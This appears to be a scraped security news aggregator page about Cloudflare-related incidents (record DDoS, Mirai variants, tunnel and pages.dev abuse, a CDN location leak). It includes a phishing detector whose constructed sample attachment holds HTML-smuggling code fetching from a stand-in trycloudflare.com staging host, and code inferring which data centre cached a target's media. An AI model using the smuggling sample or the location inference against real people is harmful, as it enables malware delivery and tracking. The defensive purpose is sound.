CyberSecurity news

FlagThis - #cloudflare

CISO2CISO Editor 2@ciso2ciso.com - 37d
Cloudflare successfully mitigated a record-breaking 5.6 Tbps Distributed Denial of Service (DDoS) attack on October 29, 2024. The attack, launched by a Mirai-variant botnet, targeted an internet service provider (ISP) in East Asia. The botnet consisted of roughly 13,000 compromised IoT devices that flooded the target with junk traffic in an attempt to cripple the ISP's operations.

The attack lasted only 80 seconds, but Cloudflare's autonomous defense systems identified and mitigated the anomalous traffic without human intervention, absorbing it at Cloudflare's edge nodes. Spread across roughly 13,000 sources, 5.6 Tbps works out to well under 1 Gbps per IP address on average, which is why attacks of this kind are hard to spot at any individual source and have to be detected in aggregate. The successful defense highlights the escalating scale of DDoS threats, with hyper-volumetric attacks exceeding 1 Tbps increasing dramatically. The incident underscores the importance of robust DDoS mitigation and the need for network defenses to keep evolving.

Recommended read:
References :
  • ciso2ciso.com: New Mirai Malware Variant Targets AVTECH Cameras, Huawei Routers – Source: www.infosecurity-magazine.com
  • securityaffairs.com: New Mirai botnet variant Murdoc Botnet targets AVTECH IP cameras and Huawei HG532 routers
  • The Hacker News: Mirai Variant Murdoc Botnet Exploits AVTECH IP Cameras and Huawei Routers
  • Techzine Global: Mirai variant Murdoc_Botnet targets cameras and routers
  • discuss.privacyguides.net: New botnet network targets Avtech cameras and Huawei HG532 routers
  • hackread.com: New Mirai Variant Murdoc_Botnet Launches DDoS Attacks via IoT Exploits
  • bsky.app: Interesting research from Qualys here where they found a botnet that’s infected vulnerable AVTECH cameras and Huawei routers.
  • cyberpress.org: New IoT Botnet Launching large-scale DDoS attacks Hijacking IoT Devices
  • gbhackers.com: New IoT Botnet Launching Large-Scale DDoS attacks Hijacking IoT Devices
  • securityonline.info: IoT Botnet Fuels Large-Scale DDoS Attacks Targeting Global Organizations
  • ciso2ciso.com: Mirai Variant Murdoc Botnet Exploits AVTECH IP Cameras and Huawei Routers – Source:thehackernews.com
  • ciso2ciso.com: New Mirai Variant Murdoc_Botnet Launches DDoS Attacks via IoT Exploits
  • Pyrzout :vm:: Mirai Variant Murdoc Botnet Exploits AVTECH IP Cameras and Huawei Routers
  • ciso2ciso.com: Mirai Botnet Launches Record 5.6 Tbps DDoS Attack with 13,000+ IoT Devices.
  • ciso2ciso.com: Details about the mitigation of the DDoS attack.
  • gbhackers.com: Record Breaking 5.6 Tbps DDoS attack Launched by Mirai Botnet
  • ciso2ciso.com: Cloudflare Mitigates Massive 5.6 Tbps Mirai-Variant DDoS Attack – Source:hackread.com
  • securityonline.info: Mirai Botnet Unleashes Record-Breaking DDoS Attack, Cloudflare Thwarts Threat
  • hackread.com: Cloudflare mitigated a record-breaking 5.6 Tbps DDoS attack
  • gbhackers.com: Researchers have identified an active malware campaign involving a Mirai botnet variant, dubbed Murdoc, which has been targeting AVTECH cameras and Huawei HG532 routers since at least July 2024.
  • BleepingComputer: The largest distributed denial-of-service (DDoS) attack to date peaked at 5.6 terabits per second and came from a Mirai-based botnet with 13,000 compromised devices.
  • securityonline.info: On October 29, 2024, Cloudflare revealed details of a DDoS attack orchestrated using a Mirai botnet comprising 13,000
  • Pyrzout :vm:: Cloudflare Mitigates Massive 5.6 Tbps Mirai-Variant DDoS Attack – Source:hackread.com
  • blog.cloudflare.com: In 2024, Cloudflare's autonomous DDoS defense systems blocked 21.3M DDoS attacks, up 53% YoY, and 420 DDoS attacks in Q4 2024 exceeded 1 Tbps, up 1,885% QoQ (The Cloudflare Blog)
  • Pyrzout :vm:: Cloudflare thwarts a massive 5.6 Tbps Mirai-variant DDoS attack targeting one of its customers

do son@Cybersecurity News - 82d
The Russian state-sponsored APT group BlueAlpha is delivering custom malware, including GammaDrop and GammaLoad, through spearphishing campaigns whose malicious HTML attachments use HTML smuggling to get past email security controls. The group routes its staging infrastructure through Cloudflare Tunnels, masking the malicious activity and making detection and disruption harder. Once installed, the malware enables credential theft, data exfiltration and persistent backdoor access to compromised networks.

BlueAlpha uses Cloudflare's TryCloudflare tool, a free tunneling service that issues randomly generated subdomains under trycloudflare.com, to route traffic through Cloudflare's network and conceal its staging servers. To further complicate detection, the group uses DNS fast-fluxing for its command-and-control (C2) domains, rotating resolutions so that blocking any single address achieves little. Its HTML smuggling relies on malicious JavaScript embedded in the HTML attachment and triggered through an onerror event handler, so the payload is assembled in the victim's browser rather than delivered as a recognizable file. The campaign is one more instance of the growing trend of threat actors hiding behind legitimate services.

Recommended read:
References :
  • bsky.app: News report on Russian hackers abusing Cloudflare's service to drop GammaDrop malware.
  • Cyber Security News: Article detailing BlueAlpha's use of Cloudflare Tunnels for malware delivery.
  • gbhackers.com: Analysis of BlueAlpha's tactics, including use of Cloudflare Tunnels and DNS fast-fluxing.
  • securityonline.info: News about BlueAlpha exploiting Cloudflare Tunnels for GammaDrop malware infrastructure.
  • www.csoonline.com: Report about Russian hackers abusing Cloudflare tunneling service to deploy GammaDrop malware.
  • SOC Prime Blog: BlueAlpha Attack Detection: russia-affiliated Hacking Collective Abuses Cloudflare Tunnels to Distribute GammaDrop Malware
  • malware.news: BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure
  • The Hacker News: Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware
  • bsky.app: Details on BlueAlpha's use of Cloudflare Tunnels to hide GammaDrop malware in phishing attacks.
  • www.cysecurity.news: Hackers Exploit Cloudflare Tunnels and DNS Fast-Flux to Conceal GammaDrop Malware

gist.github.com via pushcx@lobste.rs - 28d
A 15-year-old hacker has uncovered a significant privacy weakness in Cloudflare's caching feature. The "zero-click deanonymization attack" can expose a user's approximate location, within a 250-mile radius, without any interaction from the user. The technique affects several popular platforms, including Signal and Discord, raising privacy concerns for their users. The hacker published a write-up warning that the attack leaves no sign visible to the target and could be aimed at journalists, activists and hackers: an attacker sends a payload and learns the target's rough location within seconds.

Multiple online cybercrime platforms including Cracked, Nulled, Sellix, and StarkRDP, have been seized by law enforcement in a large international operation. These sites, which facilitated the trading of stolen data, malware, and hacking tools, were used by over 10 million users. The operation involved authorities from multiple countries, and included arrests, property searches, and the confiscation of devices and funds. Europol reports that these platforms had generated over a million euros in illicit profits. The shutdown also targeted supporting services like financial processor Sellix and hosting service StarkRDP. Authorities indicate that these forums also offered AI-based tools to automate security vulnerability scans and enhance phishing attacks.

Recommended read:
References :
  • lobste.rs: Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platform
  • The Hacker News: Authorities Seize Domains of Popular Hacking Forums in Major Cybercrime Crackdown
  • blog.cloudflare.com: Cloudflare released an outage postmortem for yesterday's incident in which multiple Cloudflare services were unavailable for almost a full hour. This caused all operations against R2 object storage to fail for the duration of the incident, and caused a number of other Cloudflare services that depend on R2 to fail as well.
  • BleepingComputer: A routine attempt to block a phishing URL in Cloudflare's R2 object storage platform backfired yesterday, triggering a widespread outage yesterday that brought down multiple services for nearly an hour.
  • cyb_detective: An attempt to block a phishing URL in Cloudflare's R2 object storage platform backfired yesterday, triggering a widespread outage that brought down multiple services for nearly an hour.

Mels Dees@Techzine Global - 86d
Cybercriminals are exploiting Cloudflare Pages (pages.dev) and Workers (workers.dev) for malicious activity, trading on Cloudflare's trusted reputation to make their attacks more convincing. The platforms, intended for legitimate web development and deployment, are being misused to host phishing pages, malicious web content and targeted email lists. Because the hostnames belong to a reputable provider and are served over Cloudflare's global network with valid TLS, phishing campaigns built on them look more legitimate and are harder to detect.

Security analysts at Fortra have reported explosive growth in phishing that uses Cloudflare Pages and Workers: a 198% increase in attacks abusing Cloudflare Pages and a 104% increase in attacks abusing Cloudflare Workers. The campaigns use techniques such as "bccfoldering" to hide recipient lists in mass mailings and CAPTCHA-like human-verification pages that lend the phishing flow an air of legitimacy (and keep automated scanners away from the final page). The ease of use and free hosting Cloudflare offers, combined with TLS certificates, custom domains and URL masking, make the platforms especially attractive to attackers.

The increasing abuse of Cloudflare's developer domains underscores the need for enhanced security measures and vigilance. Attackers are taking advantage of Cloudflare's trusted infrastructure and reverse proxy capabilities to make their attacks more difficult to trace and detect. This highlights the challenge of balancing the benefits of accessible developer platforms with the need to mitigate their potential for misuse. The significant increase in phishing attacks using these platforms emphasizes the urgency for both Cloudflare and users to adapt to this evolving threat landscape and implement stronger protective measures.
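Both the BlueAlpha item above and this Fortra item describe the same defensive problem: mail that abuses Cloudflare's free-tier services, either as HTML-smuggling attachments staged behind trycloudflare.com or as phishing links on pages.dev and workers.dev. The following is an added example, not code from any of the cited reports or from Cloudflare, that triages a message for both indicator families. The sample body and attachment are constructed, and the indicator list and weights are this example's assumptions rather than a vendor signature set.

```python
"""Triage an email for abuse of Cloudflare services.

Added example, not code from any of the reports cited on this page. It
scans a constructed message body and a constructed HTML attachment for
two indicator families described above: HTML-smuggling constructs
(onerror handlers, inline base64 blobs, Blob/createObjectURL download
code) and links to Cloudflare free-tier hostnames that the reports say
attackers abuse (trycloudflare.com, pages.dev, workers.dev). The
indicator list and the weights are this example's assumptions, not a
vendor signature set.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Cloudflare free-tier hostnames named in the reports above (assumed to be
# the only ones worth flagging here; legitimate sites also use them, so a
# hit means "look closer", not "malicious").
ABUSED_SUFFIXES = ("trycloudflare.com", "pages.dev", "workers.dev")

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

# (indicator name, pattern, weight). Weights are assumptions.
SMUGGLING_INDICATORS = [
    ("onerror_handler", re.compile(r"\bonerror\s*=", re.IGNORECASE), 3),
    ("blob_download", re.compile(r"URL\.createObjectURL|msSaveOrOpenBlob"), 3),
    ("atob_decode", re.compile(r"\batob\s*\("), 2),
    ("large_base64_blob", re.compile(r"[A-Za-z0-9+/]{400,}={0,2}"), 2),
    ("download_attr", re.compile(r"<a\b[^>]*\bdownload\b", re.IGNORECASE), 1),
]


@dataclass
class Verdict:
    score: int = 0
    hits: list = field(default_factory=list)
    suspicious_urls: list = field(default_factory=list)


def cloudflare_free_tier_host(url):
    """Return the matching free-tier suffix for a URL's host, else None."""
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    for suffix in ABUSED_SUFFIXES:
        if host == suffix or host.endswith("." + suffix):
            return suffix
    return None


def triage(body, attachment_html=""):
    """Score a message body plus one HTML attachment."""
    v = Verdict()
    for url in URL_RE.findall(body) + URL_RE.findall(attachment_html):
        suffix = cloudflare_free_tier_host(url)
        if suffix:
            v.suspicious_urls.append(url)
            v.hits.append("link_to_" + suffix)
            v.score += 2
    for name, pattern, weight in SMUGGLING_INDICATORS:
        if pattern.search(attachment_html):
            v.hits.append(name)
            v.score += weight
    return v


# Constructed sample: a lure body and a minimal smuggling attachment.
SAMPLE_BODY = ("Please review the attached invoice. "
               "Portal: https://quick-invoice-review.pages.dev/login")
SAMPLE_ATTACHMENT = (
    "<html><body>"
    '<img src="x" onerror="run()">'
    "<script>function run(){var b=atob(PAYLOAD);var blob=new Blob([b]);"
    "var a=document.createElement('a');a.href=URL.createObjectURL(blob);"
    "a.download='invoice.zip';a.click();"
    "fetch('https://random-words-1234.trycloudflare.com/stage');}</script>"
    "<script>var PAYLOAD='" + "QUJD" * 120 + "';</script>"
    "</body></html>"
)

if __name__ == "__main__":
    verdict = triage(SAMPLE_BODY, SAMPLE_ATTACHMENT)
    print("score:", verdict.score)
    print("hits:", ", ".join(verdict.hits))
    print("urls:", verdict.suspicious_urls)
```

The host check matches on the registrable suffix rather than on a substring, so `pages.dev.example.com` is not flagged while `anything.pages.dev` is. A free-tier link alone scores low because plenty of legitimate projects live on these domains; it is the combination with smuggling constructs in the attachment that pushes the sample into the range where a gateway should quarantine it.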

Recommended read:
References :
  • Cyber Security News: Cybercriminals are increasingly exploiting Cloudflare Pages (Pages.dev) and Workers (Workers.dev) for phishing and other attacks, leveraging Cloudflare’s trusted reputation and services for malicious purposes.
  • Ian Campbell: My toot is lost to time due to autodelete, but two months ago I called out* a major uptick in malicious actors using Cloudflare's pages[.]dev to attack people. Looks like Fortra dove deep on it, finally:
  • Techzine Global: Explosive growth in phishing via Cloudflare Pages and Workers
  • gbhackers.com: Cloudflare Developer Domains Abused For Cyber Attacks
  • www.bleepingcomputer.com: Hackers use Cloudflare to deploy malware

@www.bleepingcomputer.com - 34d
Cloudflare has mitigated a record-breaking 5.6 Tbps DDoS attack, illustrating the growing scale of volumetric threats. The attack came from a Mirai-variant botnet of approximately 13,000 IoT devices and targeted an East Asian Internet Service Provider. It follows the 3.8 Tbps DDoS attack Cloudflare reported in October 2024. The new attack lasted only 80 seconds and was mitigated by Cloudflare's automated systems, but it fits a worrying trend of escalating hyper-volumetric attacks: attacks over 1 Tbps increased by 1,885% from the previous quarter, and the company recorded a 53% increase in DDoS attacks overall in 2024, blocking an average of 4,870 attacks per hour.

A vulnerability in Cloudflare's CDN has also been identified that could expose a user's general location. Discovered by a security researcher, it lets a person's location be determined simply by sending them an image on platforms such as Signal and Discord. Cloudflare's CDN caches media at the data center closest to the user who fetches it, and the CDN's response headers identify which data center served a cached copy, so an attacker who requests the same image through many data centers can tell where the target's copy was cached. The technique was found to achieve an accuracy between 50 and 300 miles, raising privacy and safety concerns. Cloudflare has addressed the specific vulnerability, but it has been noted that location attacks could still be performed by other methods.
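The inference behind this item and the gist-based item earlier on the page rests on two ordinary response headers, so it is worth seeing exactly what is read from them. The following is an added example, not code from the researcher's write-up or from Cloudflare: it parses cf-ray and cf-cache-status from constructed probe responses, reports which data center already held a cached copy, and includes a Cache-Control check that a service owner can use to audit whether per-recipient media is storable by a shared cache at all. It assumes each data center keeps its own cache (tiered caching blurs the picture) and that the prober's first request through each data center is the one being examined.

```python
"""Which Cloudflare data centre served a cached copy of a resource?

Added example, not code from the researcher's write-up or from Cloudflare.
It parses the two response headers that make the cache-based location
inference described above possible:
  * cf-ray: "<request id>-<COLO>", where COLO is the IATA airport code of
    the Cloudflare data centre that handled the request
  * cf-cache-status: HIT when the object was already in that data
    centre's cache, MISS (or EXPIRED, DYNAMIC, ...) otherwise
The probe responses are constructed, not captured traffic. The inference
assumes each data centre has its own cache (tiered caching blurs it) and
that the prober has never requested the URL through that data centre
before; the prober's own MISS is what primes that cache.
"""
import re

CF_RAY_RE = re.compile(r"^([0-9a-f]+)-([A-Z]{3})$")


def parse_colo(headers):
    """Data-centre code from a cf-ray header, or None if absent/malformed."""
    match = CF_RAY_RE.match(headers.get("cf-ray", "").strip())
    return match.group(2) if match else None


def cache_status(headers):
    return headers.get("cf-cache-status", "").strip().upper()


def infer_target_colos(first_probes):
    """first_probes: one header dict per data centre, each from the FIRST
    request the prober sent for the URL through that data centre.

    A HIT on a first probe means someone else (the target) already pulled
    the object through that data centre; anything else means the prober
    just primed that cache itself."""
    hits = set()
    for headers in first_probes:
        colo = parse_colo(headers)
        if colo and cache_status(headers) == "HIT":
            hits.add(colo)
    return sorted(hits)


def storable_by_shared_cache(cache_control):
    """Does this Cache-Control value let a shared cache (a CDN edge) store
    the response? Simplified: private, no-store and a zero max-age or
    s-maxage block storage; Vary, Set-Cookie and CDN-specific overrides
    are ignored."""
    directives = {}
    for part in cache_control.split(","):
        part = part.strip().lower()
        if part:
            name, _, value = part.partition("=")
            directives[name.strip()] = value.strip()
    if "no-store" in directives or "private" in directives:
        return False
    for key in ("s-maxage", "max-age"):
        if directives.get(key, "").isdigit() and int(directives[key]) == 0:
            return False
    return True


# Constructed first-probe responses for one image URL via four data centres.
PROBES = [
    {"cf-ray": "8f1a2b3c4d5e6f70-AMS", "cf-cache-status": "MISS"},
    {"cf-ray": "8f1a2b3c4d5e6f71-FRA", "cf-cache-status": "HIT", "age": "42"},
    {"cf-ray": "8f1a2b3c4d5e6f72-SJC", "cf-cache-status": "MISS"},
    {"cf-ray": "8f1a2b3c4d5e6f73-SIN", "cf-cache-status": "EXPIRED"},
    {"cf-cache-status": "HIT"},  # malformed: no cf-ray, so it is ignored
]

if __name__ == "__main__":
    print("cached near:", infer_target_colos(PROBES))
```

The ordering constraint in `infer_target_colos` is the whole trick and the whole defense: a HIT only means anything on a data center the prober has not touched yet, which is why Cloudflare's fix concentrated on how a requester could steer requests to a chosen data center rather than on the headers themselves. For a service that serves per-recipient media through a shared cache, `storable_by_shared_cache` is the quick audit of whether the response could be cached near the recipient in the first place.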

Recommended read:
References :
  • ciso2ciso.com: Cloudflare Mitigates Massive 5.6 Tbps Mirai-Variant DDoS Attack – Source:hackread.com
  • BleepingComputer: A security researcher discovered a flaw in Cloudflare's content delivery network (CDN), which could expose a person's general location by simply sending them an image on platforms like Signal and Discord.
  • www.scworld.com: User location data exposure threatened by Cloudflare CDN vulnerability

CISO2CISO Editor 2@ciso2ciso.com - 36d
Cloudflare has successfully mitigated a massive 5.6 Tbps Distributed Denial-of-Service (DDoS) attack, a record-breaking event highlighting the increasing threat of hyper-volumetric assaults. The attack, originating from a Mirai-variant botnet, targeted an East Asian Internet Service Provider on October 29th and lasted for 80 seconds. This incident underscores the growing sophistication and scale of DDoS threats, with this particular attack leveraging over 13,000 compromised IoT devices. Cloudflare's autonomous defense systems were able to promptly mitigate the attack.

A Mirai variant tracked as "Murdoc" is exploiting vulnerabilities in AVTECH IP cameras (CVE-2024-7029) and Huawei HG532 routers (CVE-2017-17215). The Murdoc campaign uses ELF binaries and shell scripts for propagation, downloading and executing malicious payloads on the devices it compromises. The botnet has been observed on more than 1,300 IP addresses and uses over 100 command-and-control servers, with Malaysia, Thailand, Mexico and Indonesia the most affected countries. In 2024, Cloudflare blocked 21.3 million DDoS attacks, a 53% year-over-year increase, and 420 attacks in Q4 exceeded 1 Tbps.

Recommended read:
References :
  • ciso2ciso.com: Cloudflare Mitigates Massive 5.6 Tbps Mirai-Variant DDoS Attack – Source:hackread.com
  • Pyrzout :vm:: Cloudflare Mitigates Massive 5.6 Tbps Mirai-Variant DDoS Attack – Source:hackread.com
  • Techmeme: In 2024, Cloudflare's autonomous DDoS defense systems blocked 21.3M DDoS attacks, up 53% YoY, and 420 DDoS attacks in Q4 2024 exceeded 1 Tbps, up 1,885% QoQ (The Cloudflare Blog)